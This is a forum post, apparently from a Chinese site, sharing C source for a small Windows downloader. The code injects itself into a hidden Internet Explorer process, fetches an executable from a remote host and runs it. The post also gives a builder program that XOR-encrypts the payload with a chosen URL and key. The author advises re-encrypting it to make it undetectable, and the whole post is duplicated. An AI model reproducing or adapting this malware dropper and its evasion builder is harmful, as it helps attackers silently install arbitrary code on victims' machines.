/*
"mini_downloader"
code bykardinal p.s.t
Edited by stealthwalker
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/OPT:NOWIN98") //make the EXE file to be 2.5k size
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//ShellExecuteA
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//UrlDownloadToFileA
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //create remote thread,and run
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon,hkernel;
void download() //thread funciton to be injected to IE
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL," http://www.testtest.ac.cn/eeeeeeeeeeee ... eeeeeeeeen/notepad.exe","c://ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //main function
{
//1.get IE path ,and run it
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.get IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.allocate memory
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//image base address
//image size
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.write to memory,create thread
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//write data
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //create remote thread and run
//5.clean
CloseHandle(processhandle);
return;
};
//decryption function
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
//store the original data to shellcode
_asm
{
pushad;
lea esi,download;
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
rep movsb;
popad;
};
//decrypt
//int i;
//for (i=1;i<=0xFF;i++)
//{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov edx,0x2c;
xor al,dl;
stosb;
dec ecx;
jne en2;
popad;
};//end asm
__try
{
main();
//MessageBox(NULL,"ok","ok",MB_OK);
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// OutputDebugString("ERRor hehe");
// MessageBox(NULL,"error","a",MB_OK);
};
//}// end for i
return;
};
[Copy to clipboard]
i modified some snippets of it,especially the decrypt function.i removed the for cycle in order to make itself xor one time. i think you can do many things to customize the code to fit in with specific mission.for example, you can use shellcoding methods to add a decode block to the front of decoded data in order to work well, or ,randomly encrypt any block of the main code to make it undetectable.
Pay attention,the code above can not be launched as a stand-alone program.in other words,you must encrypt the download() and main() functions manually before it is launched.In order to make it easily done,i coded a SIMPLE program --a generator with c.
CODE:
#include <windows.h>
#include <stdio.h>
#include "resource.h"
HWND hDlg;
char url[76];
char key[3];
unsigned char nkey;
//convert string to bytes,borrowed from the internet
int String2Bytes(const char* pSrc, unsigned char* pDst, int nSrcLength)
{
for(int i=0; i<nSrcLength; i+=2)
{
if(*pSrc>='0' && *pSrc<='9')
{
*pDst = (*pSrc - '0') << 4;
}
else
{
*pDst = (*pSrc - 'A' + 10) << 4;
}
pSrc++;
if(*pSrc>='0' && *pSrc<='9')
{
*pDst |= *pSrc - '0';
}
else
{
*pDst |= *pSrc - 'A' + 10;
}
pSrc++;
pDst++;
}
return nSrcLength / 2;
}
BOOL CheckKey(void)
{
if(((key[0]>='0' && key[0]<='9')||(key[0]>='a' && key[0]<='f'))&&((key[1]>='0' && key[1]<='9')||(key[1]>='a' &&
key[1]<='f')))
{
if((key[0]=='0' && key[1]=='0')||(key[0]=='f' && key[1]=='f'))
return false;
else
return true;
}
else
return false;
}
void WINAPI MakeDlExe(void)
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_SERVER1), "SERVER");
if (NULL == hResInfo)
{
MessageBox(hDlg, "Failed in searching for resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
dwSize = SizeofResource(NULL, hResInfo);
// Load Resource
hResData = LoadResource(NULL, hResInfo);
if (NULL == hResData)
{
MessageBox(hDlg, "Failed in Loading Resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
// Allocate Memory
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL)
{
MessageBox(hDlg, "Failed in Allocating Memory!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
//duplicate resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
//TO customize the resource data
String2Bytes(key,&nkey,2);
CopyMemory((LPVOID)(p + 0x258), (LPCVOID)url, 76);
CopyMemory((LPVOID)(p + 0x5d7), (LPCVOID)&nkey, 1);
//for (i=1;i<0xff;i++)
//{
_asm{
push p
pop esi
add esi,0x360
push esi
pop edi
mov ecx,0x550
sub ecx,0x360
mov bl,nkey
loop1:
lodsb
xor al,bl
stosb
dec ecx
jne loop1
}
// }
//store the customized data to file
hFile = CreateFile("stealth.exe", GENERIC_WRITE, 0, NULL, Create_ALWAYS, 0, NULL);
if (hFile != NULL)
{
WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL);
MessageBox(hDlg, "Built Successfully!", "HINT", MB_OK);
}
else
{
MessageBox(hDlg, "Failed in Building File!", "ERROR", MB_OK | MB_ICONINFORMATION);
GlobalFree((HGLOBAL)p);
}
// release resources
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
}
LRESULT DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hDlg = hwndDlg;
LoadIcon(NULL,(LPCTSTR)IDI_ICON1);
SetDlgItemText(hDlg,IDC_EDIT1," http://www.r00tme.net/test.exe");
SetDlgItemText(hDlg,IDC_EDIT2,"2e");
SendDlgItemMessage(hDlg,IDC_EDIT1,EM_SETLIMITTEXT,76,0);
SendDlgItemMessage(hDlg,IDC_EDIT2,EM_SETLIMITTEXT,2,0);
break;
case WM_CLOSE:
EndDialog(hDlg, 0);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
case WM_COMMAND:
if (LOWORD(wParam) == IDC_BUTTON1)
{
ZeroMemory(url,MAX_PATH);
GetDlgItemText(hDlg,IDC_EDIT1,url,76);
GetDlgItemText(hDlg,IDC_EDIT2,key,3);
if(CheckKey())
MakeDlExe();
else
MessageBox(hDlg,"Failed in xor Key!","ERROR",MB_OK);
}
if (LOWORD(wParam) == IDC_BUTTON2)
{
EndDialog(hDlg, 0);
}
break;
}
return 0;
}
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, 0, (DLGPROC)DialogProc);
return 0;
}
[Copy to clipboard]
the resource .h file:
CODE:
//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by Script1.rc
//
#define IDD_DIALOG1 101
#define IDI_ICON1 102
#define IDR_SERVER1 103
#define IDC_EDIT1 1000
#define IDC_BUTTON1 1001
#define IDC_BUTTON2 1002
#define IDC_EDIT2 1003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 108
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1004
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
"mini_downloader"
code bykardinal p.s.t
Edited by stealthwalker
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/OPT:NOWIN98") //make the EXE file to be 2.5k size
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//ShellExecuteA
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//UrlDownloadToFileA
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //create remote thread,and run
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon,hkernel;
void download() //thread funciton to be injected to IE
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL," http://www.testtest.ac.cn/eeeeeeeeeeee ... eeeeeeeeen/notepad.exe","c://ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //main function
{
//1.get IE path ,and run it
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.get IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.allocate memory
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//image base address
//image size
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.write to memory,create thread
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//write data
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //create remote thread and run
//5.clean
CloseHandle(processhandle);
return;
};
//decryption function
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
//store the original data to shellcode
_asm
{
pushad;
lea esi,download;
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
rep movsb;
popad;
};
//decrypt
//int i;
//for (i=1;i<=0xFF;i++)
//{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov edx,0x2c;
xor al,dl;
stosb;
dec ecx;
jne en2;
popad;
};//end asm
__try
{
main();
//MessageBox(NULL,"ok","ok",MB_OK);
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// OutputDebugString("ERRor hehe");
// MessageBox(NULL,"error","a",MB_OK);
};
//}// end for i
return;
};
[Copy to clipboard]
i modified some snippets of it,especially the decrypt function.i removed the for cycle in order to make itself xor one time. i think you can do many things to customize the code to fit in with specific mission.for example, you can use shellcoding methods to add a decode block to the front of decoded data in order to work well, or ,randomly encrypt any block of the main code to make it undetectable.
Pay attention,the code above can not be launched as a stand-alone program.in other words,you must encrypt the download() and main() functions manually before it is launched.In order to make it easily done,i coded a SIMPLE program --a generator with c.
CODE:
#include <windows.h>
#include <stdio.h>
#include "resource.h"
HWND hDlg;
char url[76];
char key[3];
unsigned char nkey;
//convert string to bytes,borrowed from the internet
int String2Bytes(const char* pSrc, unsigned char* pDst, int nSrcLength)
{
for(int i=0; i<nSrcLength; i+=2)
{
if(*pSrc>='0' && *pSrc<='9')
{
*pDst = (*pSrc - '0') << 4;
}
else
{
*pDst = (*pSrc - 'A' + 10) << 4;
}
pSrc++;
if(*pSrc>='0' && *pSrc<='9')
{
*pDst |= *pSrc - '0';
}
else
{
*pDst |= *pSrc - 'A' + 10;
}
pSrc++;
pDst++;
}
return nSrcLength / 2;
}
BOOL CheckKey(void)
{
if(((key[0]>='0' && key[0]<='9')||(key[0]>='a' && key[0]<='f'))&&((key[1]>='0' && key[1]<='9')||(key[1]>='a' &&
key[1]<='f')))
{
if((key[0]=='0' && key[1]=='0')||(key[0]=='f' && key[1]=='f'))
return false;
else
return true;
}
else
return false;
}
void WINAPI MakeDlExe(void)
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_SERVER1), "SERVER");
if (NULL == hResInfo)
{
MessageBox(hDlg, "Failed in searching for resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
dwSize = SizeofResource(NULL, hResInfo);
// Load Resource
hResData = LoadResource(NULL, hResInfo);
if (NULL == hResData)
{
MessageBox(hDlg, "Failed in Loading Resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
// Allocate Memory
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL)
{
MessageBox(hDlg, "Failed in Allocating Memory!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
//duplicate resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
//TO customize the resource data
String2Bytes(key,&nkey,2);
CopyMemory((LPVOID)(p + 0x258), (LPCVOID)url, 76);
CopyMemory((LPVOID)(p + 0x5d7), (LPCVOID)&nkey, 1);
//for (i=1;i<0xff;i++)
//{
_asm{
push p
pop esi
add esi,0x360
push esi
pop edi
mov ecx,0x550
sub ecx,0x360
mov bl,nkey
loop1:
lodsb
xor al,bl
stosb
dec ecx
jne loop1
}
// }
//store the customized data to file
hFile = CreateFile("stealth.exe", GENERIC_WRITE, 0, NULL, Create_ALWAYS, 0, NULL);
if (hFile != NULL)
{
WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL);
MessageBox(hDlg, "Built Successfully!", "HINT", MB_OK);
}
else
{
MessageBox(hDlg, "Failed in Building File!", "ERROR", MB_OK | MB_ICONINFORMATION);
GlobalFree((HGLOBAL)p);
}
// release resources
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
}
LRESULT DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hDlg = hwndDlg;
LoadIcon(NULL,(LPCTSTR)IDI_ICON1);
SetDlgItemText(hDlg,IDC_EDIT1," http://www.r00tme.net/test.exe");
SetDlgItemText(hDlg,IDC_EDIT2,"2e");
SendDlgItemMessage(hDlg,IDC_EDIT1,EM_SETLIMITTEXT,76,0);
SendDlgItemMessage(hDlg,IDC_EDIT2,EM_SETLIMITTEXT,2,0);
break;
case WM_CLOSE:
EndDialog(hDlg, 0);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
case WM_COMMAND:
if (LOWORD(wParam) == IDC_BUTTON1)
{
ZeroMemory(url,MAX_PATH);
GetDlgItemText(hDlg,IDC_EDIT1,url,76);
GetDlgItemText(hDlg,IDC_EDIT2,key,3);
if(CheckKey())
MakeDlExe();
else
MessageBox(hDlg,"Failed in xor Key!","ERROR",MB_OK);
}
if (LOWORD(wParam) == IDC_BUTTON2)
{
EndDialog(hDlg, 0);
}
break;
}
return 0;
}
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, 0, (DLGPROC)DialogProc);
return 0;
}
[Copy to clipboard]
the resource .h file:
CODE:
//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by Script1.rc
//
#define IDD_DIALOG1 101
#define IDI_ICON1 102
#define IDR_SERVER1 103
#define IDC_EDIT1 1000
#define IDC_BUTTON1 1001
#define IDC_BUTTON2 1002
#define IDC_EDIT2 1003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 108
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1004
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
